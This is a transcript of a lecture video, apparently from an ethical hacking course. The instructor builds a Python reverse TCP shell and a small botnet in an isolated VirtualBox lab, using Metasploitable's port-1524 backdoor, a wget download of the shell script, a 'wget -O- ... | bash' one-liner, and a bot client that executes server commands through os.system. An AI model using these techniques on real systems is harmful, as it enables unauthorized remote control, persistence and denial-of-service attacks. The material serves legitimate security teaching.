Okay, so in this video, we're going to be looking at crafting TCP shells and botnets. So let's go ahead and get started. So some of the scripts that we're going to be using in Python for this particular lab have to do with something called socket programming. Socket programming is a way for two applications to communicate with each other over a network, and that socket usually consists of an IP address and a port number. So in our example, it's going to be port 8000. So then here on the Kali side, we request a socket from the operating system. The operating system provides a socket, and then information can be written to it back and forth. And then on the Metasploitable side, we'll use a reverse shell, which, if you recall, a reverse shell is where the victim connects to the attacker. Normally, it's the attacker connecting to the victim, but this is the opposite. And with that reverse shell, we'll also do socket programming, and through that socket, the communication will go back and forth between Kali and Metasploitable. So that's what we'll use to not only create a reverse TCP shell, but also later in the video, you'll see we'll also do a bot server. So the Metasploitable will end up becoming the bot, and Kali Linux will be the bot server. And then we'll also download another operating system later on, and then you'll see the same type of thing happen there. Okay, so for the first part of the lab, we're going to focus on the reverse shell. So for the reverse shell, first thing we'll do is we'll scan for vulnerable ports on Metasploitable using Nmap. And then we'll pick one of the vulnerable ports that are on there, or vulnerable applications, which most of them are vulnerable. And we'll pick one of those to connect to it. Then we'll load our TCP server on Kali, and we'll look at the code for the TCP server that uses Python. Then we'll also launch a Python web server to host our reverse shell client script. So remember, there's two parts. There's going to be the server and then the reverse shell code. That reverse shell code, we have to somehow get it onto the victim or get it onto Metasploitable, so that way it can be launched and then make a connection back to Kali. So once it's downloaded, once it's executed, then the hacker will have a communication with the victim machine, and then commands can be issued back and forth. So here's just kind of like an example of a reverse shell. So under normal circumstances, the hacker might try to connect to the server or to the victim, but it may be blocked from a firewall. So the trick is to somehow get the server to make the connection back to the hacker, because outgoing traffic is not restricted, but incoming traffic is. Okay, so once we do the reverse shell, after that, then we're going to look at botnet activities. And for this one, we're just going to create a very simple shell script with one command on it to ping the router or to ping pfSense. We'll call this a one-line botnet. And then the host shell script, we're going to host the shell script on the web server using the Python web server that we've used in the past to get files back and forth. And then the victim will download that script, and when they download it, they'll also end up executing whatever command is written on that one line. So in this case, it's just a ping command. But you have to imagine that if this is multiplied 1,000 times with 1,000 different computers all issuing that one command, then you could have yourself a distributed denial of service attack using a botnet in such a way. So also for this activity, not only are we going to use Metasploitable, but we're also going to use Parrot OS. Parrot OS is very similar to Kali Linux. It requires a little bit less resources, and we're going to download that, and we're going to use that as a victim machine. So we'll need to download that, and I'll show you how to do that in this video. And then once we get Parrot OS running, then we'll launch the bot server script on Kali, and we'll look over that code, see what it looks like. And then we'll launch on the Parrot OS, we'll launch the bot client script to make the connection with Kali. That way the bot server can send commands, and those commands can be executed. So this is the general idea of what we're going to be doing in our lab. So let's go ahead and get started. Hello, everybody. In this video, we're going to look at how to set up a reverse TCP shell and also how to set up a small botnet using Python. So let's go ahead and get started with this lab. So I have my 3 virtual machines turned on. I usually turn on the pfSense virtual machine first, since that's the router and also the firewall. So I usually make sure that one's on first. Once that's on and fully loaded, then I'll turn on the other 2. All right. So if you have any weird IP address issues or things are not connecting right, make sure that you're turning them on in order. All right. So here I have my Kali machine. Again, I'm going to go to the terminal here. And let's go ahead and do sudo, and in this case I'm going to do net discover. Okay, net discover, and let's see what we find. We should find our 2 machines, right? So this is pfSense, and this is Metasploitable. All right, so we'll let that run. I'm going to open another tab. Now what we're going to do is we're going to do a quick scan of our Metasploitable machine, see what services it has, and see which one we can exploit and get access to it. So let me go ahead and do nmap, and then -s, capital V, and then 192.168.1.100. Okay, so I'm going to run that, let that run, and that's going to give us a list of all the different ports that are open on Metasploitable and what services are available on that. So we'll give it a little bit. All right, there you go. So that didn't take too long. And using the V option, it also gives you the version of whatever software is running on that particular port. So that helps you find any particular exploits that you want to, or the vulnerable services that you want to look for and try to exploit. So this one has quite a few of them. So we'll use a different one today. We'll use this one here, the Metasploitable root shell. So there's a backdoor on here already installed on port 1524. So let's try that. Okay, so let me go ahead and do clear. Oh no, I won't do clear. I'll leave that there. I'm gonna open a new tab. Let me go ahead and do telnet. And then let me put the IP address here. 168.1.100, and then I'm going to use that port number, the one we found, the 1524. Okay, so go ahead and run that, and you'll see there we're in the Metasploitable. We're already in there. Okay. So let me do ls real quick. So these are all the different files and folders that we have. Okay. So of course we could go to home. So let me see here, cd home, see what's there. Okay, so there's the different folders there. I'm going to go back one level. And here in the root directory, I'm going to create a folder called shell. And I'm going to put my shell script here, my reverse shell script. So I'm going to do make directory mkdir, and I'm going to call this shell. Okay, and then I'm going to do cd shell. Okay, now I'm inside the shell folder. All right. So we have that running. That's good. Next thing we'll do is, now that we're in the machine, I want to open another tab here. And we have several Python codes that have been provided to us, Python scripts that have been provided to us by the textbook. So we'll use some of them, and then I have some other scripts that we'll use later on that I'll show you where to get in a little while. But first we'll use the ones provided by the book. So last time we downloaded the code from the book already, so it should be in your downloads folder. So let me do ls real quick. All right, and then I'm going to go cd downloads. Okay, ls. So there's our code by chapter. So we're on chapter 4. Okay, so ls. We'll go to chapter 4. Chapter -04. Okay, then we do ls. Okay, so we have our different scripts here. The two that we're going to need right now for this activity is going to be the shell server and the reverse shell. Okay, so the shell server, that's going to run on Kali. The reverse shell, we're going to try to get that in Metasploitable and then run it on Metasploitable, and then that way it'll connect back to our server. Okay. So let me go ahead and clear real quick. And then what I'm going to do is before we launch the server, we can use this time to take a look at our code. So I'm going to do shell server. I'm using mousepad for this. So mousepad shell server.py, press enter. That should load. And then we can go ahead and just start taking a look at the code to see what's going on. So we'll do that next. Okay, so this is the code for our shell server. Now, we already connected to the Metasploitable, so we already have access to it. We can run commands on it, but this is assuming that if that exploit, the one we used earlier, if that one gets patched or fixed, then we won't have access anymore. So the idea with this server and the reverse shell is to provide you a more permanent foothold on that machine and to grant you access to it even after some of those other vulnerabilities have been patched. All right, so we look at this code here. They're using the socket library, and they set the port at 8000. Right, so they usually pick a port that's not one of the well-known ones, so it doesn't interfere with anything that's already running on that particular machine or running on this particular machine, because this is going to run on Kali. Right, the other script, the one I showed you earlier, that one's going to run on the victim machine or Metasploitable. And then, of course, the socket is being set up with the IP address and with the port of 8000. And then on line 6, it starts listening for a connection. And then it'll print, once you start running the server, it'll print, and then it'll say attacker box, listening and waiting for instructions. And then when they run this function here, the server socket.accept, so here it'll just kind of hang, waiting for a connection from the reverse shell. And then once that's accepted and connected, then it'll print out, okay, thanks for connecting to me. And then it'll just run this kind of infinite loop where you can start entering commands back and forth and sending in commands. And as long as you don't type the command exit, then it'll keep allowing you to enter a command, and it'll translate it to binary, send it over the socket, send it over to the reverse shell, and then it'll print out whatever messages so that way you can see what's going on as you're taking control of it. And then once you type exit, then this will shut down and close. Okay, so that's how this particular script is working, right? And you can, of course, modify this. You can add different text. You can print out different information. So we'll see a variation of this when we look at the botnet in a little while. But for now, this works fine for what we need to do. Okay, so that's the shell server. Let's go ahead and look at the other code for the reverse shell. .py. Okay, so for the reverse shell code, we're interacting with the system, so we import sys. We're also doing a socket as well, and also subprocess. This can be used to send multiple commands over and over. And here it's a server name. This is an argument, so whenever you run the script, you have to also type the argument that goes with it. So in this case, we'll type the IP address for Kali Linux, the attacker machine, which would be 192.168.1.101. And we'll put that information. It'll set up the socket. Once, assuming the server is running, then it'll say bot reporting for duty. And then it'll show that, but it'll show it on the attacker machine. So that's why it's got to be encoded before it's sent. And then here, there's going to be a loop. Once there's a connection, there's a loop. It's waiting for the exit command to stop running. So while there's no exit, then it'll keep accepting different commands coming from the server, and then it'll run those commands and execute them until the exit is sent. Once the exit's sent, then the connection is closed. So this is pretty much all the code that it takes to set up our reverse shell, assuming the server is running. Okay. So let me go ahead and close that. And now what I'm going to do is I'm going to run the server. So I'm going to actually do two things. One, I need to run the server, and then second, I need to get the reverse shell script. I need to get that on Metasploitable. So we're going to use a web server for that. So let me go ahead and run the script. So you just do Python 3, and then run shell server.py. So go ahead and run that. Now it says attacker box is listening and waiting for instructions. So it's running. Now I'm going to open another tab and make sure you go into your folder. So in this case, I'm going to do cd downloads / let me see, downloads. What's in the download? Okay. And then cd code by chapter. And then let's do ls. And then we're going to go into chapter 4. Okay. Do ls. All right. So let me go ahead and set up our. Normally, you probably want to create a folder and only share that script that you need. You don't want to share everything. But in this case, since we're just experimenting, we can go ahead and run our web server here. So to run that using Python 3, so it's Python 3 -m http.server, and then we're going to use port 8080. Okay, so now we're running that, so that way we can jump onto the other machine and then download this script. So if you go back to your tabs right here, if you remember, we already had access to Metasploitable. So from here, we can use wget, and then I'm going to do 192.168.1.101, port 8080, and then / I need the reverse shell.py. Okay, so I was able to grab that file from Kali. It was being hosted here, and using wget, I was able to download it to the Metasploitable machine. So now it's on the Metasploitable machine. So then now from here, we can actually run the script. So on the Metasploitable, it's only got an older version of Python, but it'll work. So we'll do Python reverse shell.py, and then we need the IP address 192.168.1.101, and then an ampersand. Okay. Let me see if that's running. Okay, so it should be running. So if we go back here to our shell server, now you'll notice that thanks for connecting to me, and then it shows the IP address of the Metasploitable machine, and then the port number, And then now I can start entering commands. So I could do something like pwd, right? So I'm in the shell folder where we created that earlier. We can do ls, and we have the reverse shell there. And you can pretty much start running whatever commands you need to run. So let's see here. What else could we do? You can start, going through all the different files, right? Okay, so there's nothing there. Let me try going backwards again. Okay, so we got an error there. All right, so let me go ahead and clear real quick. And then let me go and run the server one more time. So I'm running the server. Okay. So here we ended up with an error. Okay, so I pressed enter again. Yeah, there's no up arrow here, so you're gonna have to type the command again. So Python reverse shell .py 192.168.1.101. Okay, so now that's working again. Let's see where we're at again. Okay, so it definitely works. For some reason though, we're navigating through the folders, and we ended up for some reason causing it to crash. So that may or may not happen to you, but in case it does, then you just saw how I reloaded it. Oh, and the other command we need to do is who am I? So that should show who we're logged in as. As you can see, we're logged in as root. Okay. So we can go ahead and type exit, and then that will stop it from running. Okay. So that'll stop the server from running, and I think on here, yeah, you see, and then it stops it from there. And so that's just an example of doing the reverse shell and running the server. So the next thing we're going to look at is setting up a botnet. That'll be the next thing we do. So we'll do that next. Okay, so for the next activity, I'm going to close out some of these tabs here. That way I don't confuse myself. Okay, I guess I can leave that one here. So I'm going to go ahead and open it. I closed out the old tabs, create a new tab here. And let me go ahead and go to my folder. So I think it's under downloads / code tab, code by chapter. Then I'm gonna go to chapter 04. Okay. Then I'm gonna do ls. And what I want to create here is this is a very simple example to show how a botnet works. So the idea with the botnet is to have a command server or a control server that will tell a bot what to do. Okay, so we're going to do something like that, but instead of having a fancy server and all that, we're just going to have a shell script that we're going to send to another machine, and then it'll have a command on that shell script, and it'll execute that command. So that's kind of like the general premise, but of course you can expand upon it and make it more complex. So what we're going to do here is I'm going to do a command called touch, and then I'm going to make a shell script called commands.sh. Okay, so go ahead and do that, and then if you do ls, you'll notice that it creates a shell script here, creates a file, and then we're going to transfer some text to it. So I'm going to do echo, and then here I'm going to do ping, and then I'm going to put the IP address for our router. So that's going to be 1. I guess 1.1. So ping 192.168.1.1. And then I'm going to send that to our commands shell script. So commands.sh. Okay. So that command will be there. Of course, you could put a whole bunch of other commands into this script, but this is just so you get an idea of how it works. So I'm going to press enter there, and then we do cat commands.sh. You'll notice your command is there. It's saved. So now we can host this file, and when we download it from Metasploitable, then it'll start executing this command. And if you do this with enough machines, of course you could. That's the whole point of the botnet, is to get a whole bunch of machines to attack one other machine and then cause a denial of service attack, right? But here we only have one or two machines, so but the idea is the same. All right, so let me go ahead and run the web server again. So I'm going to do python 3 -m and then http server. I'll just press the arrow key and then 8080. So we're hosting our files now. So then now what I'm going to do is, I did close out everything, so I don't have the reverse shell anymore. But I'll just jump here under Metasploitable. Okay. And then here I'll log in, msf admin, and then msf admin. Okay. And then let me go and clear all this. Okay, so then what we're going to do here is we're going to type w get, and then we're going to do dash capital O dash, and then 192.168.1.101. That's the IP address for Cali, and then the port is 8080. And then I'm going to do /commands.sh, and then I'm going to do the pipe, which is of course above the enter. That's shift. That's the pipe. It's a little it's the little line going down, and then we'll do bash. Okay, so what it'll do is it'll get the commands that are in the shell that's in that file, and then send them over to bash, and that should start executing those commands that are there. So in this case, we're just going to ping. So go ahead and press enter, and then now you'll notice after we download that file, it automatically executes the commands on that script. So it could be something more malicious, like to delete all the files on the computer or to do something else, right? But in this case, we're just pinging, and we're just pinging the router. Okay. And then if you send that script to hundreds of computers, then they can all coordinate as some sort of attack. So that's the general idea. Okay, so for this next part of the lab, I'm actually going to turn off Metasploitable, and I'm going to download another operating system. So I'm going to close Metasploitable so I can conserve some of my RAM. So I'm going to go and close this out. I'm going to power it off for now. And we'll go ahead and close this web server here. And go ahead and just close that for now. And I'm going to download another operating system called Parrot OS. And what we're going to do is we're going to set up our botnet using our scripts that I'm going to provide to you in a little while. But the only problem is I can't run it on Metasploitable, because Metasploitable is, the version of Python on it is really old. So, and I don't want to really mess with Metasploitable too much and changing what's installed on there, because it's already set up a certain way. So what I'm going to do is I'm going to go ahead and download Parrot OS, which is almost a exact copy of Kali Linux. It works really well, and so we're going to download it, and set it up here, and we'll add it to our list of virtual machines. Now, if for some reason you're running it and you end up finding out that maybe you can't handle Kali and Parrot running at the same time, then you can go ahead and still do this part of the lab, but you're just gonna have to do it on Kali on one machine. But for those that have enough RAM, we're gonna try to do it on two machines. I'm gonna have the botnet server running on Kali, and then the actual client code for the bot running on Parrot OS. So let me go ahead and go to Chrome, and I'm going to look for the Parrot OS ISO. Parrot OS ISO. So you go here, Parrot Security, and there's several versions of Parrot OS. So for now, what we're going to do is I'm going to download the home version because it's only 2.3 gigabytes. But if you want to try out the security version that's just like Kali, it's 4.6 gigabytes. It's good to try it. It's good to have it if you want to use it. But for now, we're just going to use the home edition because we're just going to use this as a victim machine just to test certain things out. And I tried to use Ubuntu, but for some reason Ubuntu was not loading for me in my VirtualBox on my other computer. So I was like, you know what, Parrot OS works really well. It's a small download, and we can even just run it in live mode. We don't even need to install it for now. So I'm going to go ahead and just download that ISO. It takes a few minutes to download. So once it finishes downloading, then I'll show you how to set it up and set it up with your other virtual machines. So we'll go ahead and do that next. And I'll come back once it finishes downloading. Okay, so once it finishes downloading, you should have the ISO file there. Let me go ahead and minimize that. And then what I'm going to do is I'm going to go here. I'm going to go to Machine and then New. And then this one here, I'm going to call it Parrot OS. And for that, you're going to set it as Linux. And then the version is going to be Debian 64-bit. Okay. I'm going to go to Next. We can try 1 gigabyte of RAM for now. If you notice any issues and if you have extra RAM to spare, then go ahead and increase it to 2. But for now, we'll try the 1024. Okay. And as far as the hard drive, I think we'll be, you know what, I'm going to increase it just a little bit just in case we need to install it later. But right for now, we're not going to install it. So, and we'll just have it dynamically allocated. So I'm going to change this to maybe 20 GB. Even though we're probably not going to use any of it. Then I'm going to hit create. Okay. And then what I'm going to do is I'm going to go to settings. And then under system, under processors, I'm going to put 2 processors. And then under storage here, I need to mount the virtual disks, or let me just go here, mount, and then choose disk file. And then under downloads, we should have our Parrot home. So I'm going to go ahead and mount that. Okay, so we're good there. And then under networking, really important, we got to set this to our internal network, and we're going to use our internal LAN. So the same network that the other machines are on. Okay. And then go ahead and turn it on. Okay, and then we're just going to press to try install. So it's going to run off of memory. Yeah, so it's going to run off of memory. So it's nothing is going to be persistent on it. So any changes you make to anything you download, once you turn it off, it's going to be gone, right? And then you have to re-download it. So I think that should be okay for now. If there's other later labs where we might need something more persistent, then I'll let you know, and then we can install it at that time. But for now, you see, and it just loads right away. for trying it. Okay, and then go ahead and go to the terminal here, and then go ahead and ping our. First, we'll ping our router. Okay, so we have a network connection there. And then go ahead and ping Google, because we do need to make sure that we're online, because we're going to need to download some of the script files that I'm going to provide you. So we need to be able to connect to GitHub. So yeah, everything's working good, and it loads right away. Looks real good, and I think you can even like zoom in and just like Kali, and it looks really nice, and it works okay. And right now I'm just running on 1 gigabyte, so hopefully that's enough to run it. But I guess if you notice any performance issues, and if you have the RAM to spare, make sure that you can leave it at 1, or you can increase it to 2. And for, of course, our lab setup, you got to make sure you have the pfSense running, Kali, and this parent machine. You can turn off the Metasploitable to conserve RAM. Okay, but it seems to be working good. So then from here, we'll go ahead and continue with the next part of the assignment. Okay, so let's go back to Kali now. And what I'm going to do is I'm going to log into Kali. And I'm going to download my scripts to set up my bot server and the client script. So what I'm going to do is I'm going to go to my downloads to try to keep my files somewhat organized. So I'm going to go to downloads, and then what I'm going to do is I'm going to download from I set up a GitHub repository for this course. So we're going to do git clone, and this time I'm going to do https://github.com/CITP 4348, and then /week3.git. Okay, so go ahead and press enter there. If there's no typos, then it shouldn't ask you for password or anything like that. It's a public repository, and it should download the files there. If you do ls, you'll notice now you have a week 3 folder. So let's go into the week 3 folder. Let me clear all that real quick. I'm going to do ls, and then we have 2 files. We have the bot server and the TCP client. All right, so the TCP client, that's where we're going to run on Parrot OS. The bot servers where we're going to run here. But let's just take a look at the code real quick, because we're going to have to make a few little changes on it. So let me do mousepad.botserver.py. Let me go ahead and run that. Okay. So here we import, before we import socket, now we're importing socket server. It's a little bit different. And here's the main function, and the main function is going to it's going to run forever, waiting for a connection. Now here I put the IP address. I don't know if your IP address is different from mine. You actually don't really need the IP address here. It'll just use the IP address of whatever machine it's running on. So, but I did put 1.101 here. But in case you have any problems with that, you can always remove it or just delete it. Right? You really don't need it. But I'll just leave it there for now. Okay. And what this is going to do, just as an example, it's not really doing anything malicious. What it's going to do, though, is it's going to run, and it's going to wait for a connection from a client. Well, client is a nice way of saying a bot, right? And once it connects once the client connects, the client's going to send over some text. And if you send that text over in lowercase, then this server will send back the same text but in uppercase, just to show that there's a connection, right? To show that they're communicating, they're sending information back and forth. So you send the information in lowercase, the server will send it back to you in uppercase. Now, once we get that working, then we can do something a little bit more malicious, where we'll actually send commands to the client for them to execute. Right? So for now, let's just see if we can get this to work. So that's the bot server. Let's look at the client real quick. So TCP client.py. Okay. So here, similar. Here, I actually put the IP address for Cali, and this one you have to put it here. If your IP address for Cali is different than mine is here, then you need to update that. But if you have the same IP address, then you're good. And then of course that's on port 8000, and I believe the other code had the port at 8000 as well. So then what this is going to do is going to create a socket. It's going to create a connection with the attacker machine, and then it's going to send. Here you'll see data, and it's sys.r. We're seeing this code again. This is the same code that we had used earlier when we were sending the IP address as an argument to our Python script. Now in this case, we're going to send some text, and that text is going to be the argument that's going to be sent to the server. And we're going to use a command called sock.sendAll. It's going to send all that text through that socket, and then the socket will send back that same text but in uppercase, and it'll be stored in a variable called received. And then here on line 18 and 19, we'll print out the original text, and then we'll print out the code that was received, the text that was sent back. So in this case, we send something in lowercase, the server will send it back in uppercase, and then we'll receive that code. Now there's some other stuff here that's commented out. So we'll look at that in a little bit. But for now, let's just see if we can get this part working. Okay, so this is Cali. So this is going to be the server. So what I'm going to do is I'm going to do Python 3, and then we're going to get our bot server running. So bot server.py. I'll go and run that. And so it's just waiting for a connection. Now what I'm going to do is I'm going to jump on to my other machine, my Parrot OS. And here you can go to downloads if you want. So it's got the same setup as Kali, pretty much. What I'm gonna do here is I don't know if I need to zoom in. It actually looks pretty good. Let me see. Let me zoom in a little more. Okay, there you go. So then I'm gonna do again git clone. I'm gonna download the same codes again. So https github.com/CITP 4348/week3.git. Okay, so it downloaded the code the same way. Do ls. We have our week 3. Okay, so let me clear that. Okay, and then I'm going to do cd week 3. Okay, and then ls. So we should have those two files here. So now this time I'm going to run the TCP client. So I'm going to do Python 3 TCP client.py. And then here I'm going to send the text. So in this case, I'm going to send the hello. And then the server is going to send back uppercase hello. Okay. So we sent out hello. The server sent this back to us. So that means that they're connected and they're working with each other. I don't know if there's any messages on Kali's side. Yes. So it says bot with, and this is 192.160.1.102, and then it shows hello. And we can just verify that very quickly. If config, check the IP address, and yeah, that's 102. So they are connected and they are communicating with each other. All right. So then from here, then we'll modify the code slightly to do the real task, which is to send commands from the server to the bot. So we'll do that next. Okay, so let me go back to Kali. So I'm going to Kali here. And I'm going to go ahead and stop the bot server. I'm going to go ahead and stop it. So I just did Control C to stop. Control C, clear that. And then let me go to mouse pad, and then I'm going to comment out and change the code a little bit. So mouse pad, let me try to spell it right. Mouse pad, and then that's going to be the bot server. If it already shows up there, just press the arrow key. Okay. And here where it's doing the to upper, that's where it was capitalizing. You send it in lowercase, and then it does upper, it makes it uppercase. All right, so I'm going to go ahead and comment. I commented that out. And then I'm going to uncomment the other code. The other code has a command here where it's just to ping. And in this case, we're pinging the router. Right, of course, you could have a text file. You could have other loop running through it. There's other things you can do, right? But of course, we're just keeping this example kind of simple. So now I uncommented that. So instead of sending back text in uppercase, now it's going to send back a command. Right. So once you make that change, go ahead and just save the current document. So just press save. Okay. And then go ahead and close that. And then go ahead and go press up. So we're going to run our server again. So now our bot server is running. Now let's go ahead and make some changes for our client. And that way the client can receive those commands and actually execute them. So then I'm going to go back to Parrot OS. Here, I'm not sure what the text editor is here, but we can use Nano. And then we'll do TCP client. Okay. So we have Nano here. And so what I'm going to do is I'm just going to scroll down. And here where it says os.system received, I'm going to uncomment that. So I'm going to remove the comments. You can disregard line 16. That was me just trying stuff out. But this one will work. So just uncomment 17. Once you have it uncommented, do Control O to save. So Control O. Let's see, anything else? Yeah, Control O. And then press Enter. Once it's canceled. For some reason, it's not letting me edit. Let me Control X exit real quick. Hit yes. Oops. Let's see, hold on real quick. Let me try sudo nano and then TCP client .py. Okay. Okay, so it seemed to have worked. Yeah, I'm not sure why I was having some trouble saving. Let's see, delete that. Okay, and then Control O. Yeah. I guess this version of Nano is a little bit different than. Okay, so yeah, I guess you have to do Control X to exit, and then you can hit yes for save, and then file name to write, TCP client.py. Press enter. So that's how it's saved there. So a little bit different from the other version that I'm used to using. Okay, but once you get that uncommented, in case you're still having problems with Nano, because Nano's not always the best, I know there's another text editor called Pluma, and that's right here. You can always open that. So go to File, Open, and then Downloads. We have our week 3. There's our TCP client, and then you can make whatever changes you need to make. In this case, I uncommented os.system.receive, and then you can just save it. So you can use Pluma as well, and that's up here under text editor. So either Nano or that's fine, as long as you can make that change. That's the main thing. Okay, so now let's go ahead and run our client again. So Python 3, and then TCP client dot py, And here, I don't think we need to enter any text. So just go ahead and press enter and see what happens. Right. So as soon as I press enter, it took that command and it actually executed it. So now um, it's pinging the router. Right. So it received the command and it started executing it just with those little changes that we made. Okay. So again, same concept as before, but now it's a little bit more advanced because we're getting the information from a server and connecting to it, and then we have a client that's running as well using Python. Okay, so I'm going to do Control C to stop that. All right, and with that, that's going to be it for this video. I hope it was informative. Thank you for watching, and I'll see you in the next one.